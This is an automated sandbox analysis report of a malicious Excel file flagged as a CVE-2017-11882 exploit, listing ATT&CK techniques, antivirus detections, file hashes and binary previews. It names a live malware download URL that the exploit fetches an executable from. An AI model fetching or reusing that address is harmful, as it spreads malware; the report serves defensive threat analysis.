    Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
    Valid Accounts1
    Native API
    Path Interception1
    Access Token Manipulation
    111
    Masquerading
    OS Credential Dumping1
    Security Software Discovery
    Remote Services1
    Archive Collected Data
    Exfiltration Over Other Network Medium1
    Encrypted Channel
    Eavesdrop on Insecure Network CommunicationRemotely Track Device Without Authorization1
    System Shutdown/Reboot
    Default Accounts12
    Exploitation for Client Execution
    Boot or Logon Initialization Scripts11
    Process Injection
    1
    Virtualization/Sandbox Evasion
    LSASS Memory1
    Virtualization/Sandbox Evasion
    Remote Desktop Protocol1
    Clipboard Data
    Exfiltration Over Bluetooth12
    Ingress Tool Transfer
    Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
    Domain AccountsAt (Linux)Logon Script (Windows)1
    Extra Window Memory Injection
    1
    Access Token Manipulation
    Security Account Manager1
    Remote System Discovery
    SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration1
    Non-Application Layer Protocol
    Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
    Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)11
    Process Injection
    NTDS2
    File and Directory Discovery
    Distributed Component Object ModelInput CaptureScheduled Transfer121
    Application Layer Protocol
    SIM Card SwapCarrier Billing Fraud
    Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
    Obfuscated Files or Information
    LSA Secrets4
    System Information Discovery
    SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
    Replication Through Removable MediaLaunchdRc.commonRc.common1
    Timestomp
    Cached Domain CredentialsSystem Owner/User DiscoveryVNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
    External Remote ServicesScheduled TaskStartup ItemsStartup Items1
    Extra Window Memory Injection
    DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


    windows-stand
    SourceDetectionScannerLabelLink
    7027521.xlsx48%VirustotalBrowse
    7027521.xlsx24%MetadefenderBrowse
    7027521.xlsx44%ReversingLabsDocument-Office.Exploit.CVE-2017-11882
    SourceDetectionScannerLabelLink
    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\raki[1].exe3%VirustotalBrowse
    C:\Users\user\AppData\Local\Temp\nsb1814.tmp\System.dll0%VirustotalBrowse
    C:\Users\user\AppData\Local\Temp\nsb1814.tmp\System.dll0%MetadefenderBrowse
    C:\Users\user\AppData\Local\Temp\nsb1814.tmp\System.dll0%ReversingLabs
    C:\Users\user\AppData\Local\Temp\secur32.dll0%MetadefenderBrowse
    C:\Users\user\AppData\Local\Temp\secur32.dll0%ReversingLabs
    C:\Users\user\AppData\Local\Temp\sxsstore.dll0%MetadefenderBrowse
    C:\Users\user\AppData\Local\Temp\sxsstore.dll0%ReversingLabs
    No Antivirus matches
    No Antivirus matches
    SourceDetectionScannerLabelLink
    http://50.16.4.125/E/raki.exe10%VirustotalBrowse
    http://50.16.4.125/E/raki.exe100%Avira URL Cloudmalware
    https://dariamob.ro/wed/eee_XScUCMEVL47.0%Avira URL Cloudsafe
    No contacted domains info
    NameMaliciousAntivirus DetectionReputation
    http://50.16.4.125/E/raki.exetrue
    • 10%, Virustotal, Browse
    • Avira URL Cloud: malware
    unknown
    https://dariamob.ro/wed/eee_XScUCMEVL47.true
    • Avira URL Cloud: safe
    unknown
    NameSourceMaliciousAntivirus DetectionReputation
    http://nsis.sf.net/NSIS_ErrorErrorvbc.exe, 00000004.00000000.464184566.000000000040A000.00000008.00000001.01000000.00000003.sdmp, vbc.exe, 00000004.00000002.679887439.000000000040A000.00000004.00000001.01000000.00000003.sdmp, vbc.exe.2.dr, raki[1].exe.2.drfalse
      high
      • No. of IPs < 25%
      • 25% < No. of IPs < 50%
      • 50% < No. of IPs < 75%
      • 75% < No. of IPs
      IPDomainCountryFlagASNASN NameMalicious
      50.16.4.125
      unknownUnited States
      14618AMAZON-AESUStrue
      Joe Sandbox Version:34.0.0 Boulder Opal
      Analysis ID:560280
      Start date:26.01.2022
      Start time:10:39:37
      Joe Sandbox Product:CloudBasic
      Overall analysis duration:0h 5m 47s
      Hypervisor based Inspection enabled:false
      Report type:light
      Sample file name:7027521.xlsx
      Cookbook file name:defaultwindowsofficecookbook.jbs
      Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
      Number of analysed new started processes analysed:7
      Number of new started drivers analysed:0
      Number of existing processes analysed:0
      Number of existing drivers analysed:0
      Number of injected processes analysed:0
      Technologies:
      • HCA enabled
      • EGA enabled
      • HDC enabled
      • AMSI enabled
      Analysis Mode:default
      Analysis stop reason:Timeout
      Detection:MAL
      Classification:mal100.troj.expl.winXLSX@4/24@0/1
      EGA Information:
      • Successful, ratio: 100%
      HDC Information:
      • Successful, ratio: 63.2% (good quality ratio 61.9%)
      • Quality average: 88.3%
      • Quality standard deviation: 21%
      HCA Information:
      • Successful, ratio: 100%
      • Number of executed functions: 0
      • Number of non-executed functions: 0
      Cookbook Comments:
      • Adjust boot time
      • Enable AMSI
      • Found application associated with file extension: .xlsx
      • Found Word or Excel or PowerPoint or XPS Viewer
      • Attach to Office via COM
      • Scroll down
      • Close Viewer
      • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, svchost.exe
      • TCP Packets have been reduced to 100
      TimeTypeDescription
      10:40:43API Interceptor56x Sleep call for process: EQNEDT32.EXE modified
      No context
      No context
      No context
      No context
      No context
      Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
      File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
      Category:downloaded
      Size (bytes):170120
      Entropy (8bit):7.49730405573374
      Encrypted:false
      SSDEEP:3072:TbG7N2kDTHUpou0lvStHlquLNLb+tAGGTCXIQOKGDYq8rmIdaDm2ghplPd:TbE/HUMFSeKSWSIQOKGDwiIoDyhplV
      MD5:0DCB37FF90B93B7A3225707B1AF111B8
      SHA1:E43402BD22A03687FC4FBE36CBB607ECC7BC1A0F
      SHA-256:4468C48F99C92E56BB04921A42676511C64B39F9AE99FCD08F2A10251618BAF2
      SHA-512:AF5D2C9D6F3EEFEACE0E9F4907251F0EB80494988A607C40B4CDA1F0EA6EE23F1D888D12F9724F6BE16EAEBA52A46F6E79136EC3D4DA0410D6E034E629E091D6
      Malicious:true
      Antivirus:
      • Antivirus: Virustotal, Detection: 3%, Browse
      Reputation:low
      IE Cache URL:http://50.16.4.125/E/raki.exe
      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...Pf..Pf..Pf.*_9..Pf..Pg.LPf.*_;..Pf.sV..Pf..V`..Pf.Rich.Pf.........................PE..L...Z.Oa.................j..........-5............@.................................|.....@..........................................................................................................................................................text....h.......j.................. ..`.rdata...............n..............@..@.data...............................@....ndata...`...`...........................rsrc...............................@..@................................................................................................................................................................................................................................................................................................................................................
      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
      File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
      Category:dropped
      Size (bytes):1099960
      Entropy (8bit):2.0153934122762553
      Encrypted:false
      SSDEEP:3072:ZXtr8tV3Iqf4ZdAt06J6dabLr92W2qtX2cT:3ahIFdyiaT2qtXl
      MD5:D6822083BFFC8F231A49532F07C2912A
      SHA1:7DFEB1E76C379822A45B7A22B3049479485A8AAF
      SHA-256:3BF445DA5FFB7F79F35705E01D731098AAF6FEC17EBE16BB20C88E232FC5AA90
      SHA-512:1E296BBE0841CD7968C67CC9F3DF873F75735B5E6FECBC55141D782E8277CB98DC12E0B0FB9EC556E5067F3815AB1E232B2F0CD5D1497D8D4860CEBD67158119
      Malicious:false
      Reputation:low
      Preview:....l...............C...........m>..?$.. EMF........&...............................................\K..hC..F...,... ...EMF+.@..................X...X...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@......................................................%...........%...................................R...p................................@."C.a.l.i.b.r.i.....................................................[V$...H....feV.@..%...$...h...........L...RQ.W............4.......$Q.W........ ...IdeV........ ............deV........................................%...X...%...7...................{$..................C.a.l.i.b.r.i...........X...X............8]V........dv......%...........%...........%...........!..............................."...........%...........%...........%...........T...T..........................@.E.@....C.......L.......................P... ...6...F..........EMF+*@..$..........?...........?.........@...........@..........*@..$..........?....
      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
      File Type:PNG image data, 150 x 150, 8-bit/color RGBA, non-interlaced
      Category:dropped
      Size (bytes):5396
      Entropy (8bit):7.915293088075047
      Encrypted:false
      SSDEEP:96:f8W/+DRQgDhhXoFGUAAX5QLwh9eDYfaiy3cHIOZ7NLXgGFMtu4vPWY1TIwD4i:f8agQgDhhXoFGUP2Lwh98YfaxcHIOPLo
      MD5:590B1C3ECA38E4210C19A9BCBAF69F8D
      SHA1:556C229F539D60F1FF434103EC1695C7554EB720
      SHA-256:E26F068512948BCE56B02285018BB72F13EEA9659B3D98ACC8EEBB79C42A9969
      SHA-512:481A24A32C9D9278A8D3C7DB86CAC30303F11C8E127C3BB004B9D5E6EDDF36830BF4146E35165DF9C0D0FB8C993679A067311D2BA3713C7E0C22B5470862B978
      Malicious:false
      Reputation:moderate, very likely benign file
      Preview:.PNG........IHDR.............<.q.....IDATx..Yo.......}.B.Z-9.";r..F..A..h....)z.~.~. .M......ia..]'Qc[ri.Dm.%R.>.9..S[.B....yn$.y.yg...9.y.{..i.t..ix<.N.....Z......}.H..A.o..[..\Gm..a....er.m....f!....$133..."...........R..h4.x.^.Earr.?..O..qz{{..........322...@Gm..y.?~L2..Z...:....0p..x<..n7.p.z..G....@.uVVV....t....x.vH<...h...J...h.(..a...O>.GUU....|.2..\ ..........p....q..P..............(.....0p.\<~..x<...2.d...E..:.H.+.7..y...n.&.i"I.{.8..-..o......q.fX.G....... .%.....f.........=.(.|>.....===<x....!L.$..R.........:.....Bww7.h...E.^G.e.^/..R(.H$....TU%...v._.]..ID....N'..=bdd..7oR..i6...a..4g.....B.@&......|>...?299I&.!....:....nW.4...?......|..G..I....+......@WW..J.d2.......&.J155u.s>..K....iw.@..C.$<.....H$...D.4...... ....Fy..!.x....W_}.O..S<...D...UUeii.d2.....T...O.Z.X,.....j..nB....Q..p8..R..>.N..j....eg.....V.....Q.h4.....$I"...u..m.!.... ..1*...6.>.....,....xP......\.c.&.x.B.@$.!.Ju4.z.y..1.f.T*.$I.J%....u.......qL.P(..F.......*....\....^..
      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
      File Type:PNG image data, 139 x 180, 8-bit colormap, non-interlaced
      Category:dropped
      Size (bytes):3747
      Entropy (8bit):7.932023348968795
      Encrypted:false
      SSDEEP:96:4apPN/1Cb2ItR9rXu7p6mtnOCRxMJZtFtQcgBF5c2SGA:1Pp1kRROtrRxSyRjST1
      MD5:5EB99F38CB355D8DAD5E791E2A0C9922
      SHA1:83E61CDD048381C86E3C3EFD19EB9DAFE743ADBA
      SHA-256:5DAC97FDBD2C2D5DFDD60BF45F498BB6B218D8BFB97D0609738D5E250EBBB7E0
      SHA-512:80F32B5740ECFECC5B084DF2C5134AFA8653D79B91381E62A6F571805A6B44D52D6FD261A61A44C33364123E191D974B87E3FEDC69E7507B9927936B79570C86
      Malicious:false
      Reputation:moderate, very likely benign file
      Preview:.PNG........IHDR.............../.....tEXtSoftware.Adobe ImageReadyq.e<...]PLTE............&f||}\\].........5G}..._l....778....................................................IDATx..]...<.nh........../)....;..~;.U..>.i.$..0*..QF@.)."..,.../._,.y,...z....c.wuI{.Xt.!f.%.!.!....X..<....)..X...K.....T.&h.U4.x.......*......v;.R.a..i.B.......A.T`.....v....N..u.........NG......e....}.4=."{.+.."..7.n....Qi5....4....(.....&.......e...].t...C'.eYFmT..1..CY.c.t.............G./.#..X....{.q.....A..|.N.i.<Y1.^>..j..Zlc....[<.z..HR......b..@.)..U...:-...9'.u. ..-sD..,.h....oo...8..M.8.*.4...........*.f..&X..V......#.BN..&>R.....&.Q.&A}Bl9.-.G.wd`.$...\.......5<..O.wuC....I.....<....(j.c,...%.9..'.....UDP.*@...#.XH.....<V...!.../...(<.../..,...l6u...R...:..t..t......m+....OI...........+X._..|S.x.6..W..../sK.}a..]EO..../....yY.._6..../U.Q.|Z,`.:r.Y.B...I.Z.H...f....SW..}.k.?.^.'..F....?*n1|.?./.....#~|.y.r.j..u.Z...).......F.,m.......6..&..8."o...^..8.B.w...R.\..R.
      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
      File Type:PNG image data, 139 x 180, 8-bit colormap, non-interlaced
      Category:dropped
      Size (bytes):2647
      Entropy (8bit):7.8900124483490135
      Encrypted:false
      SSDEEP:48:H73wCcD5X+ajENpby1MTln0V1oPd8V8EAWG09tXIa1iBINm4YwFi9:H73KAajQPiMWJG08a1qINm4jU9
      MD5:E46357D82EBC866EEBDA98FA8F94B385
      SHA1:76C27D89AB2048AE7B56E401DCD1B0449B6DDF05
      SHA-256:B77A19A2F45CBEE79DA939F995DBD54905DED5CB31E7DB6A6BE40A7F6882F966
      SHA-512:8EC0060D1E4641243844E596031EB54EE642DA965078B5A3BC0B9E762E25D6DF6D1B05EACE092BA53B3965A29E3D34387A5A74EB3035D1A51E8F2025192468F3
      Malicious:false
      Reputation:moderate, very likely benign file
      Preview:.PNG........IHDR.............../....EPLTE.......................o...ttu`aaLML.s;.../-,................~_)$....IDATx..].b.*....Y\.....o..4...bl.6.1...Y.".|.2A@y.../...X.X..X..2X.........o.Xz}go.*m..UT.DK...ukX.....t.%..iB......w.j.1].].m....._)T...Z./.%.tm..Eq...v...wNX@.I..'$CS:e.K.Un.U.v......*.P.j. .5.N.5,..B]....y..2!..^.?...5..A...>"....)...}.*.....{[e4(.Nn....x.,....t.1..6.....}K).$.I.%n$b..G.g.w.....M..w..B.......tF".YtI..C.s.~)..<@"......-..._.(x...b..C..........;5.=.......c...s.....>.E;g.#.hk.Q..g,o;Z`.$.p&.8..ia...La....~XD.4p...8......HuYw.~X.+&Q.a.H.C..ly..X..a.?O.yS,C.r..........Xbp&.D..1.....c.cp..G.....L.M..2..5...4..L.E..`.`9...@...A.....A.E;...YFN.A.G.8..>aI.I.,...K..t..].FZ...E..F....Do../.d.,..&.f.e!..6.......2.;..gNqH`...X..\...AS...@4...#.....!D}..A_....1.W..".S.A.HIC.I'V...2..~.O.A}N........@K.B./...J,.E.....[`I>.F....$v$...:,..H..K.om.E..S29kM/..z.W...hae..62z%}y..q..z...../M.X..)....B eC..........x.C.42u...W...7.7.7
      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
      File Type:PNG image data, 413 x 220, 8-bit/color RGBA, non-interlaced
      Category:dropped
      Size (bytes):10202
      Entropy (8bit):7.870143202588524
      Encrypted:false
      SSDEEP:192:hxKBFo46X6nPHvGePo6ylZ+c5xlYYY5spgpb75DBcld7jcnM5b:b740IylZ+c5xlYF5Sgd7tBednd
      MD5:66EF10508ED9AE9871D59F267FBE15AA
      SHA1:E40FDB09F7FDA69BD95249A76D06371A851F44A6
      SHA-256:461BABBDFFDCC6F4CD3E3C2C97B50DDAC4800B90DDBA35F1E00E16C149A006FD
      SHA-512:678656042ECF52DAE4132E3708A6916A3D040184C162DF74B78C8832133BCD3B084A7D03AC43179D71AD9513AD27F42DC788BCBEE2ACF6FF5E7FEB5C3648B305
      Malicious:false
      Preview:.PNG........IHDR...............|.....sRGB.........gAMA......a.....pHYs..........o.d..'oIDATx^.k...u.D.R.b\J"Y.*.".d.|pq..2.r,.U.#.)F.K.n.).JI)."....T.....!.....`/H. ...\<...K...DQ"..]..(RI..>.s..t..w.>..U....>.....s/....1./^..p..........Z.H3.y..:..<..........[...@[.........Z.`E....Y:{.,.<y..x....O..................M....M........:..tx..*..........'o..kh.0./.3.7.V...@t........x......~...A.?w....@...A]h.0./.N..^,h......D.....M..B..a}a.a.i.m...D.....M..B..a}a.a.........A]h.0.....P41..-........&.!...!.x......(.......e..a :.+.|.Ut.U_..........2un......F7[.z.?...&..qF}.}..]I...+..J.w.~Aw....V..-.....B, W.5..P.y....>[.....q.t.6U<..@.....qE9.nT.u...`..AY.?...Z<.D.t...HT..A.....8.)..M...k\...v...`..A..?.N.Z<.D.t.Htn.O.sO...0..wF...W.#H...!p....h...|.V+Kws2/......W*....Q.,...8X.)c...M..H.|.h.0....R...Mg!...B...x..;....Q..5........m.;.Q./9..e"{Y.P..1x...FB!....C.G.......41.........@t@W......B/.n.b...w..d....k'E..&..%l.4SBt.E?..m...eb*?.....@.....a :.+H...Rh..
      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
      File Type:PNG image data, 413 x 220, 8-bit/color RGBA, non-interlaced
      Category:dropped
      Size (bytes):10202
      Entropy (8bit):7.870143202588524
      Encrypted:false
      SSDEEP:192:hxKBFo46X6nPHvGePo6ylZ+c5xlYYY5spgpb75DBcld7jcnM5b:b740IylZ+c5xlYF5Sgd7tBednd
      MD5:66EF10508ED9AE9871D59F267FBE15AA
      SHA1:E40FDB09F7FDA69BD95249A76D06371A851F44A6
      SHA-256:461BABBDFFDCC6F4CD3E3C2C97B50DDAC4800B90DDBA35F1E00E16C149A006FD
      SHA-512:678656042ECF52DAE4132E3708A6916A3D040184C162DF74B78C8832133BCD3B084A7D03AC43179D71AD9513AD27F42DC788BCBEE2ACF6FF5E7FEB5C3648B305
      Malicious:false
      Preview:.PNG........IHDR...............|.....sRGB.........gAMA......a.....pHYs..........o.d..'oIDATx^.k...u.D.R.b\J"Y.*.".d.|pq..2.r,.U.#.)F.K.n.).JI)."....T.....!.....`/H. ...\<...K...DQ"..]..(RI..>.s..t..w.>..U....>.....s/....1./^..p..........Z.H3.y..:..<..........[...@[.........Z.`E....Y:{.,.<y..x....O..................M....M........:..tx..*..........'o..kh.0./.3.7.V...@t........x......~...A.?w....@...A]h.0./.N..^,h......D.....M..B..a}a.a.i.m...D.....M..B..a}a.a.........A]h.0.....P41..-........&.!...!.x......(.......e..a :.+.|.Ut.U_..........2un......F7[.z.?...&..qF}.}..]I...+..J.w.~Aw....V..-.....B, W.5..P.y....>[.....q.t.6U<..@.....qE9.nT.u...`..AY.?...Z<.D.t...HT..A.....8.)..M...k\...v...`..A..?.N.Z<.D.t.Htn.O.sO...0..wF...W.#H...!p....h...|.V+Kws2/......W*....Q.,...8X.)c...M..H.|.h.0....R...Mg!...B...x..;....Q..5........m.;.Q./9..e"{Y.P..1x...FB!....C.G.......41.........@t@W......B/.n.b...w..d....k'E..&..%l.4SBt.E?..m...eb*?.....@.....a :.+H...Rh..
      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 160x160, frames 3
      Category:dropped
      Size (bytes):4396
      Entropy (8bit):7.884233298494423
      Encrypted:false
      SSDEEP:96:1rQzp0lms5HqrrVflQ9MS5Bmy9CSKgpEfSgHk4oPQwb/BD+qSzAGW:1UF0EmEiSS3mKbbpDSk4oYwbBD+qKAX
      MD5:22FEC44258BA0E3A910FC2A009CEE2AB
      SHA1:BF6749433E0DBCDA3627C342549C8A8AB3BF51EB
      SHA-256:5CD7EA78DE365089DDDF47770CDECF82E1A6195C648F0DB38D5DCAC26B5C4FA5
      SHA-512:8ED1D2EE0C79AFAB19F47EC4DE880C93D5700DB621ACE07D82F32FA3DB37704F31BE2314A7A5B55E4913131BCA85736C9AC3CB5987BEE10F907376D76076E7CA
      Malicious:false
      Preview:......JFIF........................................................... ....+!.$...2"3*7%"0....................".........................."..............#............."...........................................................!1."AQa..q.#2R....BS.....$3Tb.4D%Crs................................................!R...AQa..1.."Sbq...............?....A.s..M...K.w.....E......!2.H...N.,E.+.i.z.!....-IInD..G....]L.u.R.lV...%aB.k.2mR.<..=."a.u...}},....:..C..I...A9w.....k.....>. .Gi......f.l...2..)..T...JT....a$t5..)..."... .. .. ....Gc..eS.$....6..._=.... d ....HF-.~.$s.9."T.nSF.pARH.@H..=y.B..IP."K$...u.h]*.#'zZ...2.hZ...K.K..b#s&...c@K.AO.*.}.6....\..i....."J..-.I/....c.R...f.I.$.....U.>..LNj..........G....wuF.5*...RX.9.-(D.[$..[...N%.29.W,...&i.Y6.:q.xi.......o...lJe.B.R+.&..a.m..1.$.,)5.)/..w.1......v.d..l...bB..JLj]wh.SK.L.....%S....NAI.)B7I.e..4.5...6......L.j...eW.=..u....#I...li..l....`R.o.<.......C.`L2...c...W..3.\...K...%.a..M.K.l.Ad...6).H?..2.Rs..3+.
      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
      File Type:PNG image data, 150 x 150, 8-bit/color RGBA, non-interlaced
      Category:dropped
      Size (bytes):5396
      Entropy (8bit):7.915293088075047
      Encrypted:false
      SSDEEP:96:f8W/+DRQgDhhXoFGUAAX5QLwh9eDYfaiy3cHIOZ7NLXgGFMtu4vPWY1TIwD4i:f8agQgDhhXoFGUP2Lwh98YfaxcHIOPLo
      MD5:590B1C3ECA38E4210C19A9BCBAF69F8D
      SHA1:556C229F539D60F1FF434103EC1695C7554EB720
      SHA-256:E26F068512948BCE56B02285018BB72F13EEA9659B3D98ACC8EEBB79C42A9969
      SHA-512:481A24A32C9D9278A8D3C7DB86CAC30303F11C8E127C3BB004B9D5E6EDDF36830BF4146E35165DF9C0D0FB8C993679A067311D2BA3713C7E0C22B5470862B978
      Malicious:false
      Preview:.PNG........IHDR.............<.q.....IDATx..Yo.......}.B.Z-9.";r..F..A..h....)z.~.~. .M......ia..]'Qc[ri.Dm.%R.>.9..S[.B....yn$.y.yg...9.y.{..i.t..ix<.N.....Z......}.H..A.o..[..\Gm..a....er.m....f!....$133..."...........R..h4.x.^.Earr.?..O..qz{{..........322...@Gm..y.?~L2..Z...:....0p..x<..n7.p.z..G....@.uVVV....t....x.vH<...h...J...h.(..a...O>.GUU....|.2..\ ..........p....q..P..............(.....0p.\<~..x<...2.d...E..:.H.+.7..y...n.&.i"I.{.8..-..o......q.fX.G....... .%.....f.........=.(.|>.....===<x....!L.$..R.........:.....Bww7.h...E.^G.e.^/..R(.H$....TU%...v._.]..ID....N'..=bdd..7oR..i6...a..4g.....B.@&......|>...?299I&.!....:....nW.4...?......|..G..I....+......@WW..J.d2.......&.J155u.s>..K....iw.@..C.$<.....H$...D.4...... ....Fy..!.x....W_}.O..S<...D...UUeii.d2.....T...O.Z.X,.....j..nB....Q..p8..R..>.N..j....eg.....V.....Q.h4.....$I"...u..m.!.... ..1*...6.>.....,....xP......\.c.&.x.B.@$.!.Ju4.z.y..1.f.T*.$I.J%....u.......qL.P(..F.......*....\....^..
      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
      File Type:PNG image data, 139 x 180, 8-bit colormap, non-interlaced
      Category:dropped
      Size (bytes):2647
      Entropy (8bit):7.8900124483490135
      Encrypted:false
      SSDEEP:48:H73wCcD5X+ajENpby1MTln0V1oPd8V8EAWG09tXIa1iBINm4YwFi9:H73KAajQPiMWJG08a1qINm4jU9
      MD5:E46357D82EBC866EEBDA98FA8F94B385
      SHA1:76C27D89AB2048AE7B56E401DCD1B0449B6DDF05
      SHA-256:B77A19A2F45CBEE79DA939F995DBD54905DED5CB31E7DB6A6BE40A7F6882F966
      SHA-512:8EC0060D1E4641243844E596031EB54EE642DA965078B5A3BC0B9E762E25D6DF6D1B05EACE092BA53B3965A29E3D34387A5A74EB3035D1A51E8F2025192468F3
      Malicious:false
      Preview:.PNG........IHDR.............../....EPLTE.......................o...ttu`aaLML.s;.../-,................~_)$....IDATx..].b.*....Y\.....o..4...bl.6.1...Y.".|.2A@y.../...X.X..X..2X.........o.Xz}go.*m..UT.DK...ukX.....t.%..iB......w.j.1].].m....._)T...Z./.%.tm..Eq...v...wNX@.I..'$CS:e.K.Un.U.v......*.P.j. .5.N.5,..B]....y..2!..^.?...5..A...>"....)...}.*.....{[e4(.Nn....x.,....t.1..6.....}K).$.I.%n$b..G.g.w.....M..w..B.......tF".YtI..C.s.~)..<@"......-..._.(x...b..C..........;5.=.......c...s.....>.E;g.#.hk.Q..g,o;Z`.$.p&.8..ia...La....~XD.4p...8......HuYw.~X.+&Q.a.H.C..ly..X..a.?O.yS,C.r..........Xbp&.D..1.....c.cp..G.....L.M..2..5...4..L.E..`.`9...@...A.....A.E;...YFN.A.G.8..>aI.I.,...K..t..].FZ...E..F....Do../.d.,..&.f.e!..6.......2.;..gNqH`...X..\...AS...@4...#.....!D}..A_....1.W..".S.A.HIC.I'V...2..~.O.A}N........@K.B./...J,.E.....[`I>.F....$v$...:,..H..K.om.E..S29kM/..z.W...hae..62z%}y..q..z...../M.X..)....B eC..........x.C.42u...W...7.7.7
      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 160x160, frames 3
      Category:dropped
      Size (bytes):4396
      Entropy (8bit):7.884233298494423
      Encrypted:false
      SSDEEP:96:1rQzp0lms5HqrrVflQ9MS5Bmy9CSKgpEfSgHk4oPQwb/BD+qSzAGW:1UF0EmEiSS3mKbbpDSk4oYwbBD+qKAX
      MD5:22FEC44258BA0E3A910FC2A009CEE2AB
      SHA1:BF6749433E0DBCDA3627C342549C8A8AB3BF51EB
      SHA-256:5CD7EA78DE365089DDDF47770CDECF82E1A6195C648F0DB38D5DCAC26B5C4FA5
      SHA-512:8ED1D2EE0C79AFAB19F47EC4DE880C93D5700DB621ACE07D82F32FA3DB37704F31BE2314A7A5B55E4913131BCA85736C9AC3CB5987BEE10F907376D76076E7CA
      Malicious:false
      Preview:......JFIF........................................................... ....+!.$...2"3*7%"0....................".........................."..............#............."...........................................................!1."AQa..q.#2R....BS.....$3Tb.4D%Crs................................................!R...AQa..1.."Sbq...............?....A.s..M...K.w.....E......!2.H...N.,E.+.i.z.!....-IInD..G....]L.u.R.lV...%aB.k.2mR.<..=."a.u...}},....:..C..I...A9w.....k.....>. .Gi......f.l...2..)..T...JT....a$t5..)..."... .. .. ....Gc..eS.$....6..._=.... d ....HF-.~.$s.9."T.nSF.pARH.@H..=y.B..IP."K$...u.h]*.#'zZ...2.hZ...K.K..b#s&...c@K.AO.*.}.6....\..i....."J..-.I/....c.R...f.I.$.....U.>..LNj..........G....wuF.5*...RX.9.-(D.[$..[...N%.29.W,...&i.Y6.:q.xi.......o...lJe.B.R+.&..a.m..1.$.,)5.)/..w.1......v.d..l...bB..JLj]wh.SK.L.....%S....NAI.)B7I.e..4.5...6......L.j...eW.=..u....#I...li..l....`R.o.<.......C.`L2...c...W..3.\...K...%.a..M.K.l.Ad...6).H?..2.Rs..3+.
      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
      File Type:PNG image data, 458 x 211, 8-bit/color RGB, non-interlaced
      Category:dropped
      Size (bytes):11303
      Entropy (8bit):7.909402464702408
      Encrypted:false
      SSDEEP:192:O64BSHRaEbPRI3iLtF0bLLbEXavJkkTx5QpBAenGIC1bOgjBS6UUijBswpJuaUSt:ODy31IAj0bL/EKvJkVFgFg6UUijOmJJN
      MD5:9513E5EF8DDC8B0D9C23C4DFD4AEECA2
      SHA1:E7FC283A9529AA61F612EC568F836295F943C8EC
      SHA-256:88A52F8A0BDE5931DB11729D197431148EE9223B2625D8016AEF0B1A510EFF4C
      SHA-512:81D1FE0F43FE334FFF857062BAD1DFAE213EED860D5B2DD19D1D6875ACDF3FC6AB82A43E46ECB54772D31B713F07A443C54030C4856FC4842B4C31269F61346D
      Malicious:false
      Preview:.PNG........IHDR..............P.l....sRGB.........gAMA......a.....pHYs...t...t..f.x..+.IDATx...|.e............{......z.Y8..Di*E.4*6.@.$$....+!.T.H/..M6..RH.l.R.!AC...>3;3;..4..~...>3.<.<..7.<3..555........c...xo.Z.X.J...Lhv.u.q..C..D......-...#n...!.W..#...x.m..&.S........cG.... s..H.=......,...(((HJJR.s..05J...2m.....=..R..Gs....G.3.z..."............(..1$..)..[..c&t..ZHv..5....3#..~8....Y...............e2...?.0.t.R}ZI..`.&.......rO..U.mK..N.8..C...[..\....G.^y.U.....N.....eff.....A....Z.b.YU....M.j.vC+\.gu..0v..5...fo.....'......^w..y....O.RSS....?.."L.+c.J....ku$._...Av...Z...*Y.0.z..zMsrT.:.<.q.....a.......O.....$2.=|.0.0..A.v..j....h..P.Nv......,.0....z=...I@8m.h.:]..B.q.C.......6...8qB......G\.."L.o..[)..Z.XuJ.pE..Q.u.:..$[K..2.....zM=`.p.Q@.o.LA../.%....EFsk:z...9.z......>z..H,.{{{...C....n..X.b....K.:..2,...C....;.4....f1,G.....p|f6.^._.c..'''Qll..........W.[..s..q+e.:.|..(....aY..yX....}...n.u..8d...L...:B."zuxz..^..m;p..(&&....
      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
      File Type:PNG image data, 458 x 211, 8-bit/color RGB, non-interlaced
      Category:dropped
      Size (bytes):11303
      Entropy (8bit):7.909402464702408
      Encrypted:false
